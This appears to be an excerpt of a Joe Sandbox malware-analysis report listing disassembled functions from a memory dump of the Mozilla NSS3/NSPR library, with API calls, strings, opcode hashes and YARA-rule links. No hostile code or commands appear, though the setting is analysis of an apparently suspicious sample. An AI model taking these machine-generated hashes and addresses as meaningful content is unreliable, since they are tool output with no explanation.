Part of subcall function 6C6809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C680BAB
Part of subcall function 6C6809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C680BBA
Part of subcall function 6C6809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C680D7E

PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6C5A2D54

Part of subcall function 6C6809D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C680BCB
Part of subcall function 6C6809D0: EnterCriticalSection.KERNEL32(?), ref: 6C680BDE
Part of subcall function 6C6809D0: OutputDebugStringA.KERNEL32(?), ref: 6C680C16

Strings

nhl, xrefs: 6C5A2D6C, 6C5A2D9A
slotID = 0x%x, xrefs: 6C5A2D02
ulPinLen = %d, xrefs: 6C5A2D36
pLabel = 0x%p, xrefs: 6C5A2D4F
pPin = 0x%p, xrefs: 6C5A2D1D
C_InitToken, xrefs: 6C5A2CE7

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken$nhl
API String ID: 420000887-3396509402
Opcode ID: 12842694eb89b02ffd49f59a3832bcd10cdcf688e9f312f5a8d3708acd8352df
Instruction ID: 6ea779d9c532d7662733a3ba4a91b67096da2705d4c3294dce171a5e0d607e38
Opcode Fuzzy Hash: 12842694eb89b02ffd49f59a3832bcd10cdcf688e9f312f5a8d3708acd8352df
Instruction Fuzzy Hash: E321D075202144EFDB009F97DCCDA4A7BB1EBC6319F448455EA0897A22CB30AC4BCB69

Function 6C642D40 Relevance: 18.2, APIs: 12, Instructions: 187COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6C642D9F

Part of subcall function 6C4FCA30: EnterCriticalSection.KERNEL32(?,?,?,6C55F9C9,?,6C55F4DA,6C55F9C9,?,?,6C52369A), ref: 6C4FCA7A
Part of subcall function 6C4FCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C4FCB26

sqlite3_exec.NSS3(?,?,6C642F70,?,?), ref: 6C642DF9
sqlite3_free.NSS3(00000000), ref: 6C642E2C
sqlite3_free.NSS3(?), ref: 6C642E3A
sqlite3_free.NSS3(?), ref: 6C642E52
sqlite3_mprintf.NSS3(6C6AAAF9,?), ref: 6C642E62
sqlite3_free.NSS3(?), ref: 6C642E70
sqlite3_free.NSS3(?), ref: 6C642E89
sqlite3_free.NSS3(?), ref: 6C642EBB
sqlite3_free.NSS3(?), ref: 6C642ECB
sqlite3_free.NSS3(00000000), ref: 6C642F3E
sqlite3_free.NSS3(?), ref: 6C642F4C

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
String ID:
API String ID: 1957633107-0
Opcode ID: 842c54806583772fb78fb386931807fac2912ac194090db3535fd013347f8e91
Instruction ID: 0bba809a01a268e9012e0d2e8d4be39077c1c68c2c9c4e8513f0667aa7290a50
Opcode Fuzzy Hash: 842c54806583772fb78fb386931807fac2912ac194090db3535fd013347f8e91
Instruction Fuzzy Hash: 15616BB5E002058BEB00CFA8D884BDEB7E1EF99348F258028DC15E7741E735E856CBA5

Function 6C587C70 Relevance: 18.1, APIs: 12, Instructions: 141COMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C6D2120,6C587E60,00000000,?,?,?,?,6C60067D,6C601C60,00000000), ref: 6C587C81

Part of subcall function 6C4F4C70: TlsGetValue.KERNEL32(?,?,?,6C4F3921,6C6D14E4,6C63CC70), ref: 6C4F4C97
Part of subcall function 6C4F4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C4F3921,6C6D14E4,6C63CC70), ref: 6C4F4CB0
Part of subcall function 6C4F4C70: PR_Unlock.NSS3(?,?,?,?,?,6C4F3921,6C6D14E4,6C63CC70), ref: 6C4F4CC9

TlsGetValue.KERNEL32 ref: 6C587CA0
EnterCriticalSection.KERNEL32(?), ref: 6C587CB4
PR_Unlock.NSS3 ref: 6C587CCF

Part of subcall function 6C61DD70: TlsGetValue.KERNEL32 ref: 6C61DD8C
Part of subcall function 6C61DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C61DDB4

TlsGetValue.KERNEL32 ref: 6C587D04
EnterCriticalSection.KERNEL32(?), ref: 6C587D1B
realloc.MOZGLUE(-00000050), ref: 6C587D82
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C587DF4
PR_Unlock.NSS3 ref: 6C587E0E

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: CriticalSectionValue$EnterUnlock$CallErrorLeaveOncerealloc
String ID:
API String ID: 2305085145-0
Opcode ID: 23ba9098d55e7d5c0fea1f5adadc95e641f13e6dc727d7e1b97d7997c6e6bd10
Instruction ID: 2e38015e20d6bfb63bb86dca830a3e94e104f0f6121b8fa6d578ef715b69dbef
Opcode Fuzzy Hash: 23ba9098d55e7d5c0fea1f5adadc95e641f13e6dc727d7e1b97d7997c6e6bd10
Instruction Fuzzy Hash: 07510871B07120AFDB019F2ACC85A6577B5FB43399F158129FE0547B21EB30E950CB99

Function 6C4F4C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6C4F3921,6C6D14E4,6C63CC70), ref: 6C4F4C97
EnterCriticalSection.KERNEL32(?,?,?,?,6C4F3921,6C6D14E4,6C63CC70), ref: 6C4F4CB0
PR_Unlock.NSS3(?,?,?,?,?,6C4F3921,6C6D14E4,6C63CC70), ref: 6C4F4CC9
TlsGetValue.KERNEL32(?,?,?,?,?,6C4F3921,6C6D14E4,6C63CC70), ref: 6C4F4D11
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C4F3921,6C6D14E4,6C63CC70), ref: 6C4F4D2A
PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6C4F3921,6C6D14E4,6C63CC70), ref: 6C4F4D4A
PR_Unlock.NSS3(?,?,?,?,?,?,?,6C4F3921,6C6D14E4,6C63CC70), ref: 6C4F4D57
PR_GetCurrentThread.NSS3(?,?,?,?,?,6C4F3921,6C6D14E4,6C63CC70), ref: 6C4F4D97
PR_Lock.NSS3(?,?,?,?,?,6C4F3921,6C6D14E4,6C63CC70), ref: 6C4F4DBA
PR_WaitCondVar.NSS3 ref: 6C4F4DD4
PR_Unlock.NSS3(?,?,?,?,?,6C4F3921,6C6D14E4,6C63CC70), ref: 6C4F4DE6
PR_GetCurrentThread.NSS3(?,?,?,?,?,6C4F3921,6C6D14E4,6C63CC70), ref: 6C4F4DEF

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
String ID:
API String ID: 3388019835-0
Opcode ID: ce03e516ea7f71f96b8b5daad6c391e3f32d749b529c2f6d21c4bf8d255af685
Instruction ID: e56c6e68b2662449362bbea35b16c3caf9ba7946395975ef86d9419347a76e99
Opcode Fuzzy Hash: ce03e516ea7f71f96b8b5daad6c391e3f32d749b529c2f6d21c4bf8d255af685
Instruction Fuzzy Hash: 4A41C4B5A04650CFCB00EF79D584D59B7F4BF86368F055629D89897700EB30E886CB99

Function 6C598F70 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 152COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C58DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C598FAF
PR_Now.NSS3(?,?,00000002,?,?,?,6C58DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C598FD1
TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C58DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C598FFA
EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C58DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C599013
PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C58DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C599042
TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C58DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C59905A
EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C58DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C599073
PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C58DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C5990EC

Part of subcall function 6C560F00: PR_GetPageSize.NSS3(6C560936,FFFFE8AE,?,6C4F16B7,00000000,?,6C560936,00000000,?,6C4F204A), ref: 6C560F1B
Part of subcall function 6C560F00: PR_NewLogModule.NSS3(clock,6C560936,FFFFE8AE,?,6C4F16B7,00000000,?,6C560936,00000000,?,6C4F204A), ref: 6C560F25

PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C58DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C599111

Strings

nhl, xrefs: 6C5990A3

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValue$InternalK11_ModulePageSizeSlot
String ID: nhl
API String ID: 2831689957-1208967380
Opcode ID: ff06476a640876125fff1f9cd2e4a3150d6093a937e98525f17c2f5714ba6d56
Instruction ID: ae9d6b08b31c08722c20b463636496daa8a15a73f5846eac5042f2261c219280
Opcode Fuzzy Hash: ff06476a640876125fff1f9cd2e4a3150d6093a937e98525f17c2f5714ba6d56
Instruction Fuzzy Hash: 1C517A74A04695CFCB00EF3AC8C8259BBF4BF4A318F0555A9DC499BB15EB31E884CB95

Function 6C687CD0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 113threadstringCOMMON

Download Yara Rule

APIs

PR_GetCurrentThread.NSS3 ref: 6C687CE0

Part of subcall function 6C639BF0: TlsGetValue.KERNEL32(?,?,?,6C680A75), ref: 6C639C07

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C687D36
PR_Realloc.NSS3(?,00000080), ref: 6C687D6D
PR_GetCurrentThread.NSS3 ref: 6C687D8B
PR_snprintf.NSS3(?,?,NSPR_INHERIT_FDS=%s:%d:0x%lx,?,?,?), ref: 6C687DC2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C687DD8
malloc.MOZGLUE(00000080), ref: 6C687DF8
PR_GetCurrentThread.NSS3 ref: 6C687E06

Strings

NSPR_INHERIT_FDS=%s:%d:0x%lx, xrefs: 6C687DF0
:%s:%d:0x%lx, xrefs: 6C687DB9

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: CurrentThread$strlen$R_snprintfReallocValuemalloc
String ID: :%s:%d:0x%lx$NSPR_INHERIT_FDS=%s:%d:0x%lx
API String ID: 530461531-3274975309
Opcode ID: c2e2cff696248e81aecdb0196972af03a86a040dba864e70df9602f7c679712a
Instruction ID: b86dd2b9e99434fa8d7da4103128e25a2c04853f2f880337c4876c248994ddb8
Opcode Fuzzy Hash: c2e2cff696248e81aecdb0196972af03a86a040dba864e70df9602f7c679712a
Instruction Fuzzy Hash: 5C41A5B56012059FDB04CF29CC809AB37E6FF85318B254568F81A8BB51D731E941CBB9

Function 6C687E20 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103filestringpipeCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C687E37
PR_GetEnvSecure.NSS3(NSPR_INHERIT_FDS), ref: 6C687E46

Part of subcall function 6C561240: TlsGetValue.KERNEL32(00000040,?,6C56116C,NSPR_LOG_MODULES), ref: 6C561267
Part of subcall function 6C561240: EnterCriticalSection.KERNEL32(?,?,?,6C56116C,NSPR_LOG_MODULES), ref: 6C56127C
Part of subcall function 6C561240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C56116C,NSPR_LOG_MODULES), ref: 6C561291
Part of subcall function 6C561240: PR_Unlock.NSS3(?,?,?,?,6C56116C,NSPR_LOG_MODULES), ref: 6C5612A0

PR_sscanf.NSS3(00000001,%d:0x%lx,?,?), ref: 6C687EAF
PR_ImportFile.NSS3(?), ref: 6C687ECF
PR_GetCurrentThread.NSS3 ref: 6C687ED6
PR_ImportTCPSocket.NSS3(?), ref: 6C687F01
PR_ImportUDPSocket.NSS3(?,?), ref: 6C687F0B
PR_ImportPipe.NSS3(?,?,?), ref: 6C687F15

Strings

NSPR_INHERIT_FDS, xrefs: 6C687E41
%d:0x%lx, xrefs: 6C687EA9

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Import$Socket$CriticalCurrentEnterFilePipeR_sscanfSectionSecureThreadUnlockValuegetenvstrlen
String ID: %d:0x%lx$NSPR_INHERIT_FDS
API String ID: 2743735569-629032437
Opcode ID: 772c9aa6ac4bac1b702583d7c8c505452d9c42e9ebc43d2eb8dae8feda71a70c
Instruction ID: 3d944e206f8d66fb86e68735a32539997bbc40e3c83969b54f45b598a76445fc
Opcode Fuzzy Hash: 772c9aa6ac4bac1b702583d7c8c505452d9c42e9ebc43d2eb8dae8feda71a70c
Instruction Fuzzy Hash: D0313771B051199BEB009F6AC844AABB7B8FF4A348F100525F40597A11E7319D06C7BE

Function 6C594E50 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C594E90
EnterCriticalSection.KERNEL32 ref: 6C594EA9
TlsGetValue.KERNEL32 ref: 6C594EC6
EnterCriticalSection.KERNEL32 ref: 6C594EDF
PL_HashTableLookup.NSS3 ref: 6C594EF8
PR_Unlock.NSS3 ref: 6C594F05
PR_Now.NSS3 ref: 6C594F13
PR_Unlock.NSS3 ref: 6C594F3A

Part of subcall function 6C5607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C4F204A), ref: 6C5607AD
Part of subcall function 6C5607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4F204A), ref: 6C5607CD
Part of subcall function 6C5607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4F204A), ref: 6C5607D6
Part of subcall function 6C5607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C4F204A), ref: 6C5607E4
Part of subcall function 6C5607A0: TlsSetValue.KERNEL32(00000000,?,6C4F204A), ref: 6C560864
Part of subcall function 6C5607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C560880
Part of subcall function 6C5607A0: TlsSetValue.KERNEL32(00000000,?,?,6C4F204A), ref: 6C5608CB
Part of subcall function 6C5607A0: TlsGetValue.KERNEL32(?,?,6C4F204A), ref: 6C5608D7
Part of subcall function 6C5607A0: TlsGetValue.KERNEL32(?,?,6C4F204A), ref: 6C5608FB

Strings

bUYl, xrefs: 6C594E5C
bUYl, xrefs: 6C594F3F

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
String ID: bUYl$bUYl
API String ID: 326028414-2688922130
Opcode ID: bc78771a84ba39893b52aabdea7f579681a52cd965a98b350c1f698dffad46fc
Instruction ID: 64f7b34547ee02a84d11ef2d7114434afb8affa5692d504310cab79d9c338230
Opcode Fuzzy Hash: bc78771a84ba39893b52aabdea7f579681a52cd965a98b350c1f698dffad46fc
Instruction Fuzzy Hash: DF413AB4A04655DFCB00EF79C4848AABBF0FF49354B018569EC9A9B710EB30EC55CB95

Function 6C5A6C40 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 87COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestInit), ref: 6C5A6C66
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C5A6C94
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5A6CA3

Part of subcall function 6C68D930: PL_strncpyz.NSS3(?,?,?), ref: 6C68D963

PR_LogPrint.NSS3(?,00000000), ref: 6C5A6CB9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C5A6CD5

Strings

nhl, xrefs: 6C5A6CF4, 6C5A6D1F
pMechanism = 0x%p, xrefs: 6C5A6CD0
hSession = 0x%x, xrefs: 6C5A6C7E, 6C5A6C8E
C_DigestInit, xrefs: 6C5A6C61
(CK_INVALID_HANDLE), xrefs: 6C5A6C9C

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit$nhl
API String ID: 1003633598-3591148122
Opcode ID: 5e0f1fba3b1be2b6c37d4e0b28c834c9b8802e18034f553628b2673eba378599
Instruction ID: 74ce6e33bccc5b28b59dd640baaabfa31c09dbf9333fc5ad48a509ce5cde391e
Opcode Fuzzy Hash: 5e0f1fba3b1be2b6c37d4e0b28c834c9b8802e18034f553628b2673eba378599
Instruction Fuzzy Hash: 3521E334601214ABDB009F9B9D98B9E77B5EB86318F448025E90997A11DF30AC09CBAD

Function 6C5BECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6C5BDE64), ref: 6C5BED0C
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5BED22

Part of subcall function 6C5CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6A18D0,?), ref: 6C5CB095

PL_FreeArenaPool.NSS3(?), ref: 6C5BED4A
PL_FinishArenaPool.NSS3(?), ref: 6C5BED6B
PR_CallOnce.NSS3(6C6D2AA4,6C5D12D0), ref: 6C5BED38

Part of subcall function 6C4F4C70: TlsGetValue.KERNEL32(?,?,?,6C4F3921,6C6D14E4,6C63CC70), ref: 6C4F4C97
Part of subcall function 6C4F4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C4F3921,6C6D14E4,6C63CC70), ref: 6C4F4CB0
Part of subcall function 6C4F4C70: PR_Unlock.NSS3(?,?,?,?,?,6C4F3921,6C6D14E4,6C63CC70), ref: 6C4F4CC9

SECOID_FindOID_Util.NSS3(?), ref: 6C5BED52
PR_CallOnce.NSS3(6C6D2AA4,6C5D12D0), ref: 6C5BED83
PL_FreeArenaPool.NSS3(?), ref: 6C5BED95
PL_FinishArenaPool.NSS3(?), ref: 6C5BED9D

Part of subcall function 6C5D64F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C5D127C,00000000,00000000,00000000), ref: 6C5D650E

Strings

security, xrefs: 6C5BED06

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
String ID: security
API String ID: 3323615905-3315324353
Opcode ID: 27052ec408a823bc30a7e1e15469b53a1e0a481133a8798b51c4c0f9d6beda70
Instruction ID: 9c2dc4bf07ade70cdfbde216b6511200364eacb339e5111e20c7ad16ff5c8fc2
Opcode Fuzzy Hash: 27052ec408a823bc30a7e1e15469b53a1e0a481133a8798b51c4c0f9d6beda70
Instruction Fuzzy Hash: FF118B35900304AFD7009669AC90FBB7378AF8220DF0A096CE80172E40FBB5B90D86DE

Function 6C680EB0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Aborting,?,6C562357), ref: 6C680EB8
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C562357), ref: 6C680EC0
PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C680EE6

Part of subcall function 6C6809D0: PR_Now.NSS3 ref: 6C680A22
Part of subcall function 6C6809D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C680A35
Part of subcall function 6C6809D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C680A66
Part of subcall function 6C6809D0: PR_GetCurrentThread.NSS3 ref: 6C680A70
Part of subcall function 6C6809D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C680A9D
Part of subcall function 6C6809D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C680AC8
Part of subcall function 6C6809D0: PR_vsmprintf.NSS3(?,?), ref: 6C680AE8
Part of subcall function 6C6809D0: EnterCriticalSection.KERNEL32(?), ref: 6C680B19
Part of subcall function 6C6809D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C680B48
Part of subcall function 6C6809D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C680C76
Part of subcall function 6C6809D0: PR_LogFlush.NSS3 ref: 6C680C7E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C680EFA

Part of subcall function 6C56AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C56AF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C680F16
